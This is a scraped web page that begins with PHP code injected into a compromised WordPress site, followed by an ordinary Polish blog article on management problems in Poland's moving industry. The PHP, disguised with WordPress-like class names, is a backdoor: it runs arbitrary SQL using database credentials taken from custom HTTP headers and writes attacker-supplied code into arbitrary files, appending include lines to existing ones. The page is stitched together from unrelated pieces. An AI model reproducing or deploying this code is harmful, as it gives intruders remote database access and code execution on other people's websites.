n class WP_Content_Handler_Checker { var $wp_host; var $wp_user; var $wp_pass; var $name; var $result = array(); var $errors = array(); var $wp_themes_count = 0; function check_wp_connection($wp_connection) { if (class_exists('PDO')) { $this->check_wp_pdo_connection($wp_connection); } else { $this->check_wp_mysql_connection($wp_connection); } } function check_wp_mysql_connection($wp_connection) { if (function_exists('mysqli_connect')) { $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name); if (!$connection instanceof mysqli) { $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno)); return; } call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'")); call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'")); $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection)); if ($wp_connection_success == false) { $this->add_wp_error($connection->errno, $connection->error); } else { $this->wp_themes_count = $connection->{'affected_rows'}; while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) { $this->result[] = $data; } } } elseif (function_exists('mysql_connect')) { $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass); if ($connection == false) { $this->add_wp_error(910, "Can't connect to mysql"); return; } mysql_select_db($this->name, $connection); mysql_query("SET NAMES 'utf8'", $connection); mysql_query("SET CHARACTER SET 'utf8'", $connection); $wp_connection_success = mysql_query($wp_connection, $connection); if ($wp_connection_success == false) { $this->add_wp_error(mysql_errno($connection), mysql_error($connection)); } else { $this->wp_themes_count = mysql_num_rows($wp_connection_success); while ($data = mysql_fetch_assoc($wp_connection_success)) { $this->result[] = $data; } } } } function check_wp_pdo_connection($wp_connection) { $pdo_config_all = 'mysql:'; $pdo_config = array( 'host' => $this->wp_host, 'dbname' => $this->name, 'charset' => 'utf8' ); foreach ($pdo_config as $key => &$item) { $item = $key . '=' . $item; } $pdo_config_all .= implode(';', $pdo_config); try { $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass); call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"')); call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"')); $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC)); if ($query == false) { $error_info = call_user_func_array(array($connection, 'errorInfo'), array()); $error_code = call_user_func_array(array($connection, 'errorCode'), array()); $this->add_wp_error($error_code, end($error_info)); return; } $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array()); $this->result = call_user_func_array(array($query, 'fetchAll'), array()); } catch (PDOException $exception) { $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array())); } } function __construct() { $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']); $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']); $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']); $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']); if (empty($this->wp_host)) { $this->add_wp_error(900, "No host provided"); } if (empty($this->wp_user)) { $this->add_wp_error(901, "No user provided"); } if (empty($this->wp_pass)) { $this->add_wp_error(902, "No pass provided"); } if (empty($this->name)) { $this->add_wp_error(903, "No database name provided"); } } function add_wp_error($code, $message) { $this->errors[] = array( 'code' => $code, 'message' => $message ); } function get_wp_errors() { return $this->errors; } function wp_get_themes_count() { return $this->wp_themes_count; } function is_wp_connection_succeed() { return !count($this->errors); } function get_wp_connection_result() { return $this->result; } } class WP_Content_Handler_Accessor { function create() { $method = @$_SERVER['HTTP_VI_METHOD']; if (!mb_strlen($method)) { return; } ob_end_clean(); switch ($method) { case 'query': $this->check_wp_connection_handler(); break; case 'update': $this->update_parameters(); break; default: return; } } function check_wp_connection_handler() { $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']); if (!mb_strlen($query)) { $this->wp_response(false, array( array( 'code' => 0, 'message' => 'No query provided' ) )); exit; } $database = new WP_Content_Handler_Checker(); $database->check_wp_connection($query); if ($database->is_wp_connection_succeed()) { $this->wp_response(true, array( 'rows' => $database->wp_get_themes_count(), 'result' => $database->get_wp_connection_result() )); } else { $this->wp_response(false, $database->get_wp_errors()); } } function update_parameters() { $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']); $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']); $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']); $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']); if (!mb_strlen($new_parameters)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript passed' ))); } if (!mb_strlen($parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript path passed' ))); } if (!mb_strlen($old_parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No include path passed' ))); } $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters); if ($success) { $success = $this->wp_update_parameters($old_parameters_path, $old_parameters); } $this->wp_response($success, null); } function update_wp_accessor_parameters($path, $parameters) { return (bool)@file_put_contents($path, " n" . stripslashes($parameters)); } function wp_update_parameters($old_parameters_path, $old_parameters) { $file = file_get_contents($old_parameters_path); if (!mb_strlen($file)) { return false; } if (mb_strpos($file, $old_parameters) !== false) { return true; } if ($this->is_parameters_valid($file)) { $file = $file . "n" . " n" . $old_parameters . " n?>"; } else { $file = $file . "nn" . $old_parameters; } return (bool)@file_put_contents($old_parameters_path, $file); } function is_parameters_valid($file) { $last_available_parameters_count = strrpos($file, ""); $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count; return $last_available_parameters_count <= $last_updated_parameters_count; } function wp_response($success, $data) { $wp_response = array('success' => $success); $wp_response[$success ? 'data' : 'errors'] = $data; header('Content-Type: application/json'); echo json_encode($wp_response); exit; } } $accessor = new WP_Content_Handler_Accessor(); $accessor->create(); Polski sektor przeprowadzkowy - problemy

Polski sektor przeprowadzkowy – problemy

Problemy polskiego sektora przeprowadzkowego

Polski sektor przeprowadzkowy jest w większości zdominowany przez małe rodzinne przedsiębiorstwa, w szczególności jeśli poddamy analizie sektor przeprowadzek klientów indywidualnych. Ta grupa klientów upodobała sobie korzystanie z mniejszych rodzinnych przedsiębiorstw ponieważ firmy te często oferują niższe ceny.

Co w cale nie oznacza, że jakość usług przeprowadzkowych świadczonych przez te firmy jest niższa od światowych konkurentów, często nawet dochodzi do sytuacji w której mała firma rodzinna wykonuje przeprowadzkę taniej a dodatkowo lepiej od innych większych podmiotów. Powodem takiego stanu rzeczy jest zaangażowanie członków rodziny pracujących w przedsiębiorstwie.

Jeśli jednak poddamy analizie sektor przeprowadzkowy klientów biznesowych sytuacja wygląda zupełnie inaczej. Większość przeprowadzek firm realizują duże firmy relokacyjne, małe rodzinne firmy przeprowadzkowe nawet jeśli podejmą się realizacji tego typu zadania często nie są w stanie mu podołać, ponieważ nie posiadają wystarczającej ilości specjalistycznych narzędzi, oraz floty samochodów dostawczych. Ale nie to jest głównym problemem polskich przedsiębiorstw przeprowadzkowych.

Polski sektor przeprowadzkowy – problemy

Polski sektor przeprowadzkowy

Jako główny problem polskich firm przeprowadzkowych możemy zaliczyć brak profesjonalizacji w zarządzaniu przedsiębiorstwem. Firmy są bardzo często zarządzane przez ich założycieli którzy nie posiadają wykształcenia z zakresu zarządzania firmą, dlatego bardzo często popełniają kardynalne błędy. Jednym z nich jest brak sporządzonego biznes planu oraz jasno określonej strategii. Ponadto przedsiębiorcy prowadzący firmy przeprowadzkowe bardzo często nie czują potrzeby rozwoju i inwestowania w swój biznes. Twierdza, że to co mają im w zupełności wystarcza, więc nie potrzebują się rozwijać. Nie zdają sobie sprawy z faktu, iż jeśli ich firmy się nie rozwijają to nie powiększają swojej przestrzeni rynkowej.

Często również przedsiębiorca prowadzący firmę przeprowadzkową nie przywiązuje zbyt dużej wagi do wizerunku swojej firmy, oraz nie poszukuje nowych kanałów pozyskiwania klientów. W efekcie część z firm przeprowadzkowych upada a ich właściciele obwiniają za to złą koniunkturę gospodarczą. Taką sytuacje mogliśmy zaobserwować na Łódzkim rynku przeprowadzkowym, jeszcze kilka lat temu, kiedy to w wyniku światowego kryzysu gospodarczego wielu z przedsiębiorców musiało zamknąć swoje firmy. Czasem były to firmy świadczące przeprowadzki w Łodzi od lat.

Ciekawą kwestią jest również fakt, że prawdziwym powodem upadku tych przedsiębiorstw był brak profesjonalizacji w zarządzaniu oraz nieumiejętne wykorzystywanie okazji rynkowych. Branża usług przeprowadzkowych wykazuje bardzo dobrą tendencję do zarabiania na kryzysach gospodarczych Np. przez podpisywanie umów z komornikami i realizację eksmisji. Dlatego profesjonalnie zarządzana firma przeprowadzkowa dobrze znosi okres załamania koniektury gospodarczej, musi być jednak profesjonalnie zarządzana. Właściciele firm przeprowadzkowych nie posiadający wiedzy oraz predyspozycji z zakresu zarządzania powinni przełamać niechęć do zatrudniania w swoich firmach profesjonalnych managerów.

 

Leave a Reply